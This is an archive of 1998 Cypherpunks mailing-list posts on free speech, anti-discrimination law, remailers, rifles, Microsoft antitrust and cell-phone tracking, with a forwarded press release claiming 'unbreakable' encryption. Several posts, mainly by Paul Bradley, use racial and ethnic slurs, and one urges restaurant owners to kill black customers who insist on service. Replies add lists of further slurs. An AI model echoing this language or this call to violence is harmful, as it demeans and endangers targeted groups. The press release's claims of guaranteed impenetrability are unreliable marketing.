>1) Sedtious advocacy under
>the Brandenburg standard.
>2)
Defamation precedence in which the Supreme Court
>ruled that a public figure
has to demonstrate actual malice and reckless
>disregard for truth.
>The
Supreme Court has never ruled that _all_ speech is
>protected unless it is
directed to incite or produce imminent lawless or
>likely to incite or produce
such action.
>Does this mean that defamation
>against the goverment or a
foreign goverment could be subject for civil action
>as long the statute
applied would meet the Sullivan standard?
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mikhael Frieden <mikhaelf@mindspring.com>
Date: Fri, 2 Jan 1998 06:10:42 +0800
To: Paul Bradley <craffert@ml.com>
Subject: Re: Freedom Forum report on the State of the First Amendment
Message-ID: <3.0.16.19980101165908.0c4f464c@pop.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



At 08:18 PM 1/1/98 +0000, Paul Bradley wrote:

>> It is about basic human decency, and giving a person a fighting chance.

>No, acts of law which require employers not to discriminate against 
>niggers, wops, kikes or greezers, or any other ratial group infringe 
>basic rights of association, I personally have no racist prejudices, but 
>recognise the freedom of others to be as bigotted as they care to be.

        Does that include the krauts, micks, limeys, frogs as well as the
canucks and pea soup eaters? The polacks, chinks and dagos? The Wogs too? 

        Can't we all be ethnic slurs together? 

        Which reminds me. We never did get a good one for the Russians. Any
nominations? 


-=-=-

Censorship is OK if it is of them. 
	-- the F-C motto





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mikhael Frieden <mikhaelf@mindspring.com>
Date: Fri, 2 Jan 1998 06:10:42 +0800
To: Paul Bradley <craffert@ml.com>
Subject: Re: Freedom Forum report on the State of the First Amendment
Message-ID: <3.0.16.19980101170044.0dff4600@pop.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



At 08:13 PM 1/1/98 +0000, Paul Bradley wrote:
>
>> > Should the government be able to take action against me because I fire 
>> > someone for being jewish/black/homosexual???
>> 
>> Welcome to the 20th Century, moron.
>
>You clearly have no comprehension of the principles of the free market 
>and the rights of businesses and individual to hire and fire whoever the 
>fuck they like for any reason whatsoever. I am no racist, but I defend 
>your right to be as racist as you see fit.

        You are obviously an evil person if you do so against the self
annointed, even though they self identify themselves as 30% racist. 

-=-=-

Censorship is OK if it is of them. 
	-- the F-C motto





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Antonomasia <ant@notatla.demon.co.uk>
Date: Fri, 2 Jan 1998 03:48:05 +0800
To: usura@basement.replay.com
Subject: Re: HIP97 photos
Message-ID: <199801011921.TAA01743@notatla.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



Alex de Joode :

> Hmm, I think she only got 3 photos ..

End of one film.  The rest are in the post now.

--
##############################################################
# Antonomasia   ant@notatla.demon.co.uk                      #
# See http://www.notatla.demon.co.uk/                        #
##############################################################





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul Bradley <paul@fatmans.demon.co.uk>
Date: Fri, 2 Jan 1998 05:18:10 +0800
To: Colin Rafferty <craffert@ml.com>
Subject: Re: Freedom Forum report on the State of the First Amendment
In-Reply-To: <ocryb1c2i2u.fsf@ml.com>
Message-ID: <Pine.LNX.3.91.980101201216.1054A-100000@fatmans.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain




> > Should the government be able to take action against me because I fire 
> > someone for being jewish/black/homosexual???
> 
> Welcome to the 20th Century, moron.

You clearly have no comprehension of the principles of the free market 
and the rights of businesses and individual to hire and fire whoever the 
fuck they like for any reason whatsoever. I am no racist, but I defend 
your right to be as racist as you see fit.

        Datacomms Technologies data security
       Paul Bradley, Paul@fatmans.demon.co.uk
  Paul@crypto.uk.eu.org, Paul@cryptography.uk.eu.org    
       Http://www.cryptography.home.ml.org/
      Email for PGP public key, ID: FC76DA85
     "Don`t forget to mount a scratch monkey"






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul Bradley <paul@fatmans.demon.co.uk>
Date: Fri, 2 Jan 1998 05:16:49 +0800
To: Colin Rafferty <craffert@ml.com>
Subject: Re: Freedom Forum report on the State of the First Amendment
In-Reply-To: <ocru3bz3lrh.fsf@ml.com>
Message-ID: <Pine.LNX.3.91.980101201550.1054B-100000@fatmans.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain




> It is about basic human decency, and giving a person a fighting chance.

No, acts of law which require employers not to discriminate against 
niggers, wops, kikes or greezers, or any other ratial group infringe 
basic rights of association, I personally have no racist prejudices, but 
recognise the freedom of others to be as bigotted as they care to be.

        Datacomms Technologies data security
       Paul Bradley, Paul@fatmans.demon.co.uk
  Paul@crypto.uk.eu.org, Paul@cryptography.uk.eu.org    
       Http://www.cryptography.home.ml.org/
      Email for PGP public key, ID: FC76DA85
     "Don`t forget to mount a scratch monkey"







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul Bradley <paul@fatmans.demon.co.uk>
Date: Fri, 2 Jan 1998 05:16:58 +0800
To: Colin Rafferty <craffert@ml.com>
Subject: Re: Freedom Forum report on the State of the First Amendment
In-Reply-To: <ocrsorj3l6w.fsf@ml.com>
Message-ID: <Pine.LNX.3.91.980101201917.1054C-100000@fatmans.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain




> You are not being coerced into anything.  If you don't want to serve
> food to Blacks, don't open a restaurant.  It's your choice.

I really hate having to go over and over basic points, but will do in the 
hope of bringing even a tiny glimmer of enlightenment to you:

If you don`t want to serve food to blacks, open and restaurant and refuse 
to serve blacks in it, put a sign on the door saying "whites only, 
no niggers please", if blacks try to force you to serve them in your 
restaurant protect your rights by killing them. Simple as that.

> By the way, you are also not allowed to dump toxic waste in your own
> backyard.  Are you being oppressed?

Dumping toxic waste in my back yard will kill my neighbours.
How does refusing to hire blacks or any other group harm anyone but 
myself (in terms of trade levels)? 

> > Colin, do you consider
> > yourself oppressed when someone choses not to date you?  What about
> > a rejection by someone who takes out a public advertisement in the paper?
> 
> Nope.  Of course, this has nothing to do with anything.

On the contrary it is an entirely analagous situation, someone is 
choosing not to associate with you, do you go crying to the govt. 
claiming you didn`t get a fair shake because sarah in accounts wouldn`t 
fuck you at the office christmas party?

> With freedom comes responsibility.  Decency is one of them.

With freedom comes responsibility not to infringe someone elses rights, I 
infringe no-one elses rights by refusing to hire them...

        Datacomms Technologies data security
       Paul Bradley, Paul@fatmans.demon.co.uk
  Paul@crypto.uk.eu.org, Paul@cryptography.uk.eu.org    
       Http://www.cryptography.home.ml.org/
      Email for PGP public key, ID: FC76DA85
     "Don`t forget to mount a scratch monkey"






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul Bradley <paul@fatmans.demon.co.uk>
Date: Fri, 2 Jan 1998 05:22:05 +0800
To: Colin Rafferty <craffert@ml.com>
Subject: Re: Freedom Forum report on the State of the First Amendment
In-Reply-To: <ocrn2hr3df7.fsf@ml.com>
Message-ID: <Pine.LNX.3.91.980101202557.1054D-100000@fatmans.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain




> > Where do you get the right to tell others how they can make a living?
> 
> I don't have that right.  However, the Supreme Court has said that the
> Congress has that right.

Then that must be right... This is starting to look like a troll.

        Datacomms Technologies data security
       Paul Bradley, Paul@fatmans.demon.co.uk
  Paul@crypto.uk.eu.org, Paul@cryptography.uk.eu.org    
       Http://www.cryptography.home.ml.org/
      Email for PGP public key, ID: FC76DA85
     "Don`t forget to mount a scratch monkey"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: remailer@geocities.com
Date: Fri, 2 Jan 1998 10:00:37 +0800
To: cypherpunks@toad.com
Subject: Remailer
Message-ID: <199801020146.RAA10880@geocities.com>
MIME-Version: 1.0
Content-Type: text/plain



Check out <http://www.cyberpass.net/~winsock/>, for a remailer that will
run on any winsock compatible connection.  I think there is a ftp site in
europe.  I can't remember if it runs on NT, so check out the site.

At 10:58 AM 1/1/98 -0800, you wrote:
>Okay, I'd like to set up a remailer - but I don't know where to start!
Unfortunatly it's going to have to run on an NT 4.0 box, so the winsock
remailer is out of the question, right? And I'm not in the US, so I can't
use the juno stuff -- so what (if anything) *can* I use?
>
>Thanks for any help...
>
>
>
>
>
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Miller <dm0@avana.net>
Date: Fri, 2 Jan 1998 09:08:51 +0800
To: "Robert A. Costner" <pooh@efga.org>
Subject: Re: IRC Internet chat with Electronic Frontiers (fwd)
In-Reply-To: <3.0.3.32.19980101141316.0362f05c@mail.atl.bellsouth.net>
Message-ID: <34AC4B93.5ECBC8DD@avana.net>
MIME-Version: 1.0
Content-Type: text/plain



Robert A. Costner wrote:
> 
> To be honest, I'm getting confused on the time zones.  Today I noticed a
> mistake I made earlier when I added when I should have subtracted.  Plus I
> haven't figured out Australia and GMT time yet, to do it without thinking.
> More info about times, and hopefully any corrections can be found at
> 
>         http://www.efga.org/about/meeting.html

There is a Windows 3.1/95 program called "WorldClock" you might want to
see at:

http://www.mindspring.com/~otterson/worldclock/index.html

I haven't tried it myself, so don't consider this an endorsement.

--David Miller

middle  rival
devil rim lad

Windows '95 -- a dirty, two-bit operating system.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Julian Assange <proff@iq.org>
Date: Thu, 1 Jan 1998 19:08:37 +0800
To: cypherpunks@toad.com
Subject: Jim Bell... lives... on... in... Hollywood!
Message-ID: <wxbtxwbh5n.fsf@polysynaptic.iq.org>
MIME-Version: 1.0
Content-Type: text/plain




Anyone noticed this before?

------- Start of forwarded message -------
Date: 1 Jan 1998 09:54:51 -0000
Message-ID: <19980101095451.25998.qmail@suburbia.net>
From: proff@suburbia.net
To: proff@suburbia.net
Subject:home.html


   
                           Scoop the Grim Reaper!
                                      
                               Who will live?
                                      
                               Who will die?
                                      
        And who will win the grand prize in Dewey's Death Pool -- an
   all-expense paid, two-day Hollywood Death Tour for two. Or one of four
          quarterly prizes -- a fabulous celebrity death library.
                                      
     It's fun, it's easy -- and all you have to do to win is correctly
     forecast more celebrity deaths for the calendar year 1998 than any
                               other entrant.
                                      
    Here's how it works: Between now and December 31, 1997, fill out an
   entry form, listing your picks in descending likelihood of death. For
     instance, if you believe Celebrity X is a cinch to die within the
   year, list him or her in the No. 1 slot, followed by your second most
     likely choice in the No. 2 slot, etc. For tie-breaking reasons, a
   correct pick in the top slot is worth 10 points, a correct pick in the
    second is worth 9 points, and so forth. (Please list an alternative
      name in the event that one of your choices dies before the game
   begins. The alternative will be substituted in the empty slot and you
              will not receive credit for the original name.)
                                      
     At the end of the year, the contestant with the most correct picks
   wins. If there's a tie, the winner will be the person with the highest
     point total. In the event of a point-tie, the contestant with the
          youngest decedent will win. Judges' decisions are final.
                                      
     In addition, quarterly prizes (an assortment of guide books, maps,
   videos and other celebrity death memoribilia) will be awarded for the
   most correct picks within the four three-month intervals ending 11:59
    EST on March 31, June 30, September 30 and December 31, 1998. In the
   event of ties, tie-breaker rules described above apply. Standings will
                     be updated on the site regularly.
                                      
   To qualify as a correct "hit," a death must be noted in one or more of
   the following publications: New York Times, Los Angeles Times, U.S.A.
                      Today, Time, Newsweek or People.
                                      
     Paid obituaries do not count; the death notice MUST appear in the
      context of a news story, roundup item or editorial obituary. If
   someone's death is not mentioned in one of the above publications, you
                          will not receive credit.
                                      
    You will not receive credit for a death if you somehow contribute to
   that person's demise. If there's any dispute over the exact date of a
    celebrity's demise, information listed on the death certificate will
                                  prevail.
                                      
    Dewey's Death Pool is open to residents of the 50 United States and
      the District of Columbia who are 18 years or older. For complete
                       rules, see the Official Rules.
                                  [INLINE]
                            home | entry | rules
                                      
     _________________________________________________________________
                                      
                       Back to Webb Page Confidential

------- End of forwarded message -------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@cypherpunks.to>
Date: Fri, 2 Jan 1998 08:31:10 +0800
To: cypherpunks@Algebra.COM
Subject: Need secondary DNS
Message-ID: <Pine.BSF.3.96.980101234102.29721A-100000@pakastelohi.cypherpunks.to>
MIME-Version: 1.0
Content-Type: text/plain



I am looking for somebody outside North America to run a secondary DNS for
cypherpunks.to. Please email me directly, not the list.

Thanks,
-- Lucky Green <shamrock@cypherpunks.to> PGP v5 encrypted email preferred.
   "Tonga? Where the hell is Tonga? They have Cypherpunks there?"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brian B. Riley" <brianbr@together.net>
Date: Fri, 2 Jan 1998 13:36:30 +0800
To: "Jim Choate" <cypherpunks@ssz.com>
Subject: Re: Guns: H&K, G3, 7.62 v 5.56 [Guns] (fwd)
Message-ID: <199801020526.AAA02793@mx01.together.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

On 1/1/98 2:19 PM, Jim Choate (ravage@ssz.com)  passed this wisdom:

>> Subject: Re: Guns: H&K, G3, 7.62 v 5.56 [Guns]
>> From: Ryan Lackey <rdl@mit.edu>
>> Date: 01 Jan 1998 13:47:02 -0500
>
>> 2) In my (somewhat limited) experience, many field-improvised 
>> concealment locations are great during firing, but when you move
>> to cycle the action on a bolt action rifle, you make the
concealment
>> shake or otherwise reveal yourself.  Against a force with
>> sniper/antisniper weaponry, that will likely
>
>> All that being said, for field use and home defense, if I'm alone,
>> I'd take a barrett .50 browning for long-range USMC-style
>> scout-sniping, or
>
>You obviously haven't seen the flash or the dust cloud from one of 
>these beasties fired from ground level. Hiding at anything less 
>than a mile is notsomething you're going to do very well.  

 IIRC, the Barret gun with all its gear is also a multiperson load as
well, so the 'alone' part isn't very valid either.

-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv

iQEVAwUBNKx6SD7r4fUXwraZAQEzGgf/Ymp7/s0+FlgpBQgNs81x8cqasRAjFrIf
gvF0fG+XsLeoDaeohFf1uKUktkYE0zoO5G3IBBY9QJ69uPYDKlyFfQJldWYHPL56
2i9bfMuqnrj+sCOLJl54X/WaucO9WrUYNC16RulXblPohj8HBqGp9y73iybbfycb
mQdbfhyTYeuM5X3vjcCOVzKHTl4hPqxijeJjL4OUtx5NeUDnZWlp9PRkVDY5CHLu
dvr8LJvmbF9vzUSOLAjUeHD3j8rjzR8wRQ9ZeeDkH6leevjuI1NAH/J1xB5bWxgC
zrzud/QFgs0rX38YZlLnpP4iekXcqWaq2j+SfptBD1BthK7nuqf9mg==
=33z2
-----END PGP SIGNATURE-----


Brian B. Riley --> http://members.macconnect.com/~brianbr
  For PGP Keys  <mailto:brianbr@together.net?subject=Get%20PGP%20Key>

 "Saying windows 95 is equal to Macintosh is like finding a potato
  that looks like Jesus and believing you've seen the Second Coming."
  -- Guy Kawasaki (MacWorld, Nov '95)







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <anon@anon.efga.org>
Date: Fri, 2 Jan 1998 19:00:33 +0800
To: cypherpunks@Algebra.COM
Subject: Re: Freedom Forum report on the State of the First Amendment
Message-ID: <f8c1969fe2b346817264b015a915fdf2@anon.efga.org>
MIME-Version: 1.0
Content-Type: text/plain



>        Which reminds me. We never did get a good one for the Russians. Any
>nominations?

Klintonkov? As in Comrade Klintonkov?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@Algebra.COM (Igor Chudov @ home)
Date: Fri, 2 Jan 1998 22:40:03 +0800
To: cypherpunks@www.video-collage.com
Subject: Meganet's Unbreakable Virtual Matrix Encryption Takes the Market by Storm; Finally in 1998 Absolute Security...
Message-ID: <199801021435.IAA27120@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text



CNN Custom News:



          Repeat/Meganet's Unbreakable Virtual Matrix Encryption Takes
          the Market by Storm; Finally in 1998 Absolute Security...

          LA Times 02-JAN-98 LOS ANGELES--(BUSINESS WIRE)--Dec. 31,
          1997--Finally Meganet's highly acclaimed unbreakable encryption,
          Virtual Matrix Encryption (VME) is for sale. Meganet, a San
          Fernando Valley software development company, is proud to
          announce the release of a full line of encryption products.

          VME 98 is available in six (6) levels of front-end applications
          in three (3) flavors: DOS, Win 16 (Windows 3.x), and Win
          32 (Windows 95 & NT). The VME 98 Standard Edition, VME
          98 Professional Edition, VME 98 Enterprise Edition, VME 98
          Custom Client Edition, VME 98 Custom Server Edition, & VME 98
          Batch Server Edition provide unprecedented security, options,
          and flexibility. The pricing ranges from $100.00 for a single
          retail license to over $1,000,000.00 for the most sophisticated
          VME 98 Batch Server Edition.

          In addition, three (3) SDK's (Software Developer Kits) are
          ready to assist software developers in easily integrating
          VME 98 into their existing and future products. The three (3)
          SDK's include an 8bit DOS Engine, 16bit Windows DLL (Win 3.x)
          and 32bit Windows DLL (Win 95 & NT).

          The possibilities are endless with the array of VME 98
          products. Now any application including but not limited
          to Internet commerce, Government communications, banking
          transactions, corporate secrets and personal computer data
          can be guaranteed complete impenetrability.

          Yes, the VME 98 is the same product that was posted on the
          Internet with a $1 million reward for anyone that could break
          a VME encrypted file. Over fifty five thousand (55,000) tried
          with zero (0) success.

          Yes, the VME 98 is the same product that challenged Microsoft,
          IBM, AT&T, Dell, Hewlett-Packard, Intel, America Online,
          Netscape, etc. to break a VME encrypted file. All the great
          computer minds in this country have had an opportunity to
          dispel the bold claims of unbreakable encryption, yet none have.

          Meganet is pleased to offer the same standard of excellence
          with all of the VME 98 packages.

          Additional information about this exciting new technology can
          be found at www.meganet.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Attila T. Hun" <attila@hun.org>
Date: Fri, 2 Jan 1998 16:51:33 +0800
To: Bill Stewart <crisp@rambus.com>
Subject: Time to Pay the Piper
Message-ID: <19980102.081442.attila@hun.org>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

>From: Bill Stewart <bill.stewart@pobox.com>
>To: "Attila T. Hun" <attila@hun.org>, 
>    cypherpunks <cypherpunks@cyberpass.net>
>Subject: Re: Making them eat their words... (while they watch!)
>Date: Sun, 21 Dec 1997 11:56:54 -0800
>
> At 05:15 PM 12/21/1997 +0000, Attila T. Hun wrote:
>>    there is only one solution to organizations like M$ 
>>    which are operated without ethics: treat them to the
>>    pleasures of not only the antitrust laws but the 
>>    exquisite delights of RICO.

> Nonsense, and I'm surprised to hear this from you.

    No, Bill. it's not nonsense... 

    1)  when a true market monopoly exists, society _is_
        entitled to intervene. I wrote my Harvard thesis on
        antitrust and the effect on society of a monopoly,
        regulated in the public interest as in AT&T v. the
        industrial monopolies. this may have been 35 years
        ago, but the principles are even more imperative
        now with the increasing concentration of real wealth
        both individually and corporately in the hands of a 
        few.
    
    2)  why should you be surprised to hear this from me? 
        sure, I would prefer anarchy per se, but have
        absolutely no faith that the vast majority would do
        anything except rape, pillage, and plunder. and, I
        think I have made my beliefs more than plain over 
        the history trail of cypherpunks.
   
    anarchy is nothing more than an isolationist theory; as 
    a political system it does not work --never has, never 
    will. ergo, there is a need for some government in the
    interest of the people (sheeple, if you prefer).  man 
    has not proved his worth on this planet, and whether or
    not you believe in God is irrelevant.  the last several
    generations have bequeathed a wilting, dying polluted
    earth to their children and grandchildren.

    therefore, I am neither your revolutionary anarchist
    nor your "lost in the clouds" libertarian idealist; I am
    just a pragmatist who wishes we could govern with an
    enlightened electorate in the manner of a New Hampshire 
    town meeting; a pragmatist that I believe limited
    regulation is essential, but a foolish dreamer to hope
    for an enlightened electorate.

> Treat them to the pleasures of the free market -
> if you don't like them, start a Boycott M$ campaign,
> and see if people stop buying their lousy software.

    no, Bill, there is no alternative in the mass market. A
    perfect example is Gate$ buying _both_ WebTV and their
    competitor to make sure he has _all_ the action.

    another is EnCarta. Gate$ gave it away until the other
    vendors dropped out of the market; now M$ charges for
    the encyclopedia.

    Gate$ is the perfect example of not only a pure monopoly
    with 90% of the OS market, but also a constructive
    monopoly who has leveraged the first position to force
    monopolies in other areas: 95% of word processing, 95%
    of spreadsheets, and approaching the total domination of
    the browser market.

    Secondly, Gate$ is spreading into the control of the
    means of distribution in cable, networks, etc. and
    likewise into media content. Gate$ current actions are
    those of a spoiled four year old child who sees nothing
    wrong with demanding it all.

> The direct democracy of the free market is far more 
> appropriate than government here - it's $1/vote, 
> and if enough people vote against M$ they'll get the hint, 
> and it enough people vote _for_ M$, it's none of your 
> business.

    WRONG! when 90% of the voters are dependent on M$, M$ has
    bought the vote. to the average user, to vote against M$ is
    to vote against a free v. a not-free browser, etc.

    WRONG AGAIN: the OEM computer group has no choice either;
    software is available from virtually every software house
    for M$ --and only M$.  therefore the OEM has no choice of
    operating system. without the software, any competing OS
    is useless. M$ has also intimidated and constrained the 
    software houses. Corel is a good case in point with M$
    threatening to withhold critical information on Windows 
    95 if Corel delivered their 32 bit product to OS/2 
    first.

    WRONG AGAIN: M$ has required OEMs to load Explorer as part
    of the "privilege" to be able to load the OS. That is
    restraint of trade. when they try to exercise total
    market control through their customers with their own
    marketing policies.

    WRONG AGAIN: M$ is forcing Explorer on totally 
    non-related software vendors. Why should the 
    accounting software vendor in MN be required to load
    Explorer to be able to distribute the OS --and, most
    additional M$ packages in networking, etc required
    Explorer for essential DLLs.  this is "binding" in
    FTC unfair practices regulations.

> It _is_ funny to see the Feds hiring a big corporate lawyer
> to run their case; I guess they don't think Federal Prosecutors
> are good enough.  Surely if a low-level prosecutor can't hack it,
> they should use their boss, and on up the hierarchical chain.
> If Janet Reno can't do it either, they should replace her with
> someone who can :-) 

    GRIN?  Bill, I'm surprised you would say this.  Reno is
    not an anti-trust specialist.  just how many of them are
    there in the country as a whole?  not many?  why?  --not
    much anti-trust action; usually the FTC has been able to
    block mergers, etc.  before they become a menace to
    society such as M$ has become.

    this is where the failure of the free market comes in:
    few companies manage to attain the total monopoly
    position; _none_ to date have done so with clean hands. 

    frankly, Gate$' hands are dirtier than Cornelius
    Vanderbilt's hands were in his heyday; and Cornelius
    Vanderbilt made John D. Rockefeller and J.P. Morgan look
    like angels.

    Gate$' literally has not only violated the anti-trust
    laws and the FTC rules on fair competition, but he has
    done so deliberately in what can easily be defined as a
    conspiracy to limit or prevent access to the market
    --and that can be construed as a RICO offense --and
    should be. Neither Gate$ nor Ballmer show the slightest
    interest in backing off what they consider their God
    given rights in a free market to rape, pillage, and
    burn; they feel that M$ is entitled to tell the American
    (or world) buyer what he wants to buy. monopoly 
    eliminates freedom of choice.

    I do not usually have much use for Jesse Berst, whom I 
    generally consider a senseless and shameless M$ schill,
    like the rest of Ziff-Davis; however, this is what Jesse
    had to say Monday:

        Jesse Berst, 22 Dec.

        "I'm a fan of its [Microsoft's] accomplishments 
        and its great products.  More than that, I'm
        a fan of personal computing.  That's why I can say 
        that it's better for us -- and better for Microsoft
        -- if the DOJ forces the company to play fair.  Only
        intense competition can keep a company from the
        hardening of the attitudes that eventually damaged
        companies such as IBM, Digital, Wang and Data
        General."

    to engender that competition, M$ needs to be forced to
    divest either operating systems or products.  despite 
    any imagined gains of their increasing integration, the
    market can not fall to a monolithic line and then expect
    further advances with no-one nipping at M$' heels

    unfortunately, M$ idea of competition has not been to be
    just the market leader --it has fostered an attitude 
    that it can be the only player.

    and like all monopolies, M$ has fallen into the Al
    Sloan mode ("What's good for General Motors is good for 
    the country").

        more Jesse Berst, 22 Dec.

        "That's why I can say with all sincerity, the more 
        you like Microsoft, the more you admire its
        accomplishments, the more you appreciate its
        products, the more you should root for the DOJ to
        win its latest case.  Anybody who thinks otherwise
        should be forced to attend every single match of
        the World Wide Wrestling Federation next year.  That 
        will give them an up-close-and-painful taste of what
        happens when you do away with competition.

    Jesse, the Microsoft schill, is now at least as strident
    as I have been since the late 80s when the uncontrolled
    direction of Gate$' marketing and operating system
    leverage over office products became more than evident.
    the DOJ should have broken M$ into separate companies in
    1994.

    instead, the DOJ made a deal with a "Joe Stalin", who,
    true to Lenin's manifestos, would sign any treaty which
    bought him time to develop the prohibited weapons --then
    he broke it. M$ violated the consent decree before it
    was certified in court and.  in reality, applied even
    more onerous terms to the hardware OEM vendors; we are
    reaping the results of Gate$ incredible arrogance today.

    Gate$ also broke the public trust by arrogantly usurping
    by whatever means more of the market --his actions 
    today are untenable in a civilized market. any 
    suggestions that if you do not like M$, you should not
    buy M$ products are hollow inanities --to the public, 
    there is no alternative --economies of scale and market
    dominance have wiped out all but a few niche market 
    vendors. 

    the sheeple never revolt; they just follow the Judas
    goat to the abattoir happily enjoying the free software
    while Gate$ builds his tollGate$ (nice pun --guess I 
    will add that to my lexicon). the sheeple will not be
    happy when they find themselves being nicked for every
    transaction, on or off Gate$' networks.

    --and if Gate$ actions over the past 3 years were not
    enough, his ridiculous, affrontive, and offensive
    response to the Judge's order is prima facie evidence of
    not only a monopoly, not only a constructive monopoly,
    but a tyrannical, maniacal monster who is still a
    spoiled four year old brat with absolutely no conscience
    or sense of social responsibility.

    the fact Steve Ballmer, et al, echo this dictatorial 
    policy in violation of US law is prima facia evidence of 
    an ongoing criminal enterprise which employs extortion
    --yes, literally extortion-- in the furtherance of its
    business plan --and this is a RICO offense for which
    Gate$ and his henchman certainly appear to have
    deservedly earned the right to 3 hots and a cot for the
    20 years minimum on the lesser RICO charge, or mandatory
    life imprisonment on a conspiracy of greater than 6.  

    Secondly, none of Gate$ lieutenants and captains can
    claim they acted under orders; it wont fly any more than
    it flew at Nuremberg.

    Esther Dyson (with Margie Wylie of CNET)

        But it is big government that's watching them, not
        ...

        Yes--and that's why we need to keep...I mean, God
        bless the Justice Department for fighting Microsoft;
        God bless Microsoft for creating good products, and
        the customers for keeping everybody in line.  This
        is what I want:  I don't want anybody to win.  I
        want the game to keep going.  I want little guys to
        keep on coming up and tweaking the noses of the big
        guys.

        I've always been a believer in antitrust.  It's the
        concentration of power that bothers me, not whether
        it's "for profit" or "for government."  And I've
        never claimed to be or not to be a Libertarian.
        People put labels on things and stop thinking.

    a good clear statement from Dyson on the public 
    interest.

    do you think M$ should be permitted to behave in
    their autocratic and callous manner towards software
    developers who have no need for Explorer?

        Brian Glaeske, a programmer/analyst with Fargo,
        North Dakota-based Great Plains Software, complained
        to the US Justice Department last month that
        Microsoft effectively requires him and others to
        provide its browser in his accounting software,
        which has nothing to do with the World Wide Web or
        the Internet.

        "Microsoft should not be permitted to force
        third-party developers to redistribute Microsoft
        Internet Explorer in order to use [new] features,"
        Glaeske wrote to Joel Klein, the Justice
        Department's top pursuer of antitrust allegations.

    is not Glaeske's position reasonable? the real point
    however, does not relate to the browser; the bottom line
    is that Glaeske, and most of the software developers, do
    not have an alternative to Microsoft as an operating 
    system.  

    Oh, sure, some clients will run Unix flavours and there
    are vendors for most high profile applications on unix
    and OS/2, but the vast majority (90%) of the clients
    take the easy way out and go Microsoft --M$ is what the
    employees have at home; M$ is what the "trained"
    employees have used before.... there are millions of
    arguments, after WinTel being cheaper, why they should
    not change --starting with "why should we be different?"

    a pure free market is anarchy; anarchy may be a 
    wonderful idea for utopian people; the human race is far
    from being anything except a selfish, greedy collection
    of individuals who are constrained either by the threats
    of fire and brimstone from the church, or the laws of 
    the land which punish transgressions of socially 
    acceptable behaviour --fair or not.

    even Teddy Roosevelt wrote that anarchists should be 
    hunted down and exterminated like vermin.

    William H. Gates III is just another robber baron who 
    really believes the statement: "What's good for 
    Microsoft is good for the country."  Al Sloan never 
    realized his monopoly with General Motors, although 
    there have been periods where GM was over 50% of the 
    market (when Chrysler was close to failing). 

    Bill Gates has created an effective monopoly _world_
    _wide_ which far surpasses any monopoly ever created
    by one individual or company; even John D. Rockefeller 
    did not come close to Gate$' power.  John D. was also
    rather benevolent.  IBM never approached Gate$' level
    of monopoly.

    Gate$ has proven, and is proving while the very 
    litigation is going on, that he is not a benevolent 
    monopolist; there is only one way: Bill's way, and
    everyone will think like Bill, or they will be the
    vermin to be exterminated.

    and, that, my friends, is why there is such a thing
    as the public interest; and it should have been 
    exercised on BadBillyG in 1994.

    my vote goes to prosecute Bill Gates and Steve Ballmer,
    at the very least, for violations of the Sherman Act,
    the Clayton Antitrust Act, and the Robinson-Patman 
    amendments (FTC, etc.) to the full extent of the law,
    including criminal violations as warranted under those
    titles; and prosecute under the RICO statutes for an
    ongoing racketeering (extortion is racketeering) and
    criminal enterprise.

    frankly, I am disappointed that it has come to this, but
    Gate$ greed and lust for power has not only exceeded 
    his common sense, it has transgressed the boundary of
    baseline social responsibility.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: latin1
Comment: No safety this side of the grave. Never was; never will be

iQBVAwUBNKyor7R8UA6T6u61AQHtcAH/XVaZQWl+IicPv7adVvLy/Yy4xkBj7mUP
lyU0ecw8oQPCxB2zhtPQcwvPtCMJVBc3y8UtSuAu/i8Kn4XzWeS+EA==
=GIWP
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Murray <ericm@lne.com>
Date: Sat, 3 Jan 1998 01:53:04 +0800
To: whgiii@invweb.net
Subject: Re: Mobile phones used as trackers
In-Reply-To: <199801012054.PAA25297@users.invweb.net>
Message-ID: <199801021756.JAA13004@slack.lne.com>
MIME-Version: 1.0
Content-Type: text/plain



William H. Geiger III writes:
> In <v03102808b0d0b5632db7@[208.129.55.202]>, on 12/31/97
>    at 06:53 PM, Steve Schear <schear@lvdi.net> said:
> 
> >and keep your cell phone turned off.
> 
> It is my understanding that they can still track you with the cell phone
> turned off so long as there is power going to the box (most auto cell
> phones are hardwired into the cars electrical system).

How?


The little I know about cellular is that the handset only broadcasts
to the cells when its on.  Of course, 'on' and 'off' might mean
different things on a hand-held with limited battery life, and a
mobile that's connected to a large battery with a generator (car).
But it doesn't make sense to have the even the mobile system constantly
communicating with cells and getting hand-offs when the operator
has switched it 'off' and isn't using it-  it'd be taking up bandwidth
for no reason at all.  And we all know that cellular bandwidth is
in short supply.

-- 
